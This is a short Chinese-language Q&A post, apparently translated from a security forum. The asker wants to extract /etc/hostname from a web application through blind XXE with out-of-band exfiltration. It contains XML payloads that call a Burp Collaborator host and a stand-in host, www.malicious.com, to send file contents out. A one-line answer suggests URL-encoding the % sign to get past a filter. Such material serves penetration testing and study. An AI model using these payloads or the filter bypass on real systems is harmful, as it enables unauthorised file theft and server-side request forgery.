带OOB数据抽取的XXE

Question

场景：

我成功地向burp协作者发送了一个请求，然后应用程序就会通过盲目的XXE容易受到SSRF的攻击。我使用的有效载荷如下

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [  <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]> 
<xxx>&xxe;</xxx>

如果我像这样使用XML实体(% xxe)

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE % xxe [  <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]> 
<xxx>%xxe;</xxx>

载荷不起作用。因此，我假设XML参数实体或%符号被过滤了。

目标：

作为下一步，我想从web应用程序中提取/etc/hostname。我发现的有效载荷如下：

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/hostname" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>

....which使用XML参数实体(%)。如何修改有效负载以避免使用%。删除%是否足以具有语法正确的有效负载？

Answer 1

这在很大程度上取决于应用程序的XML解析器。但是，尝试使用%编码%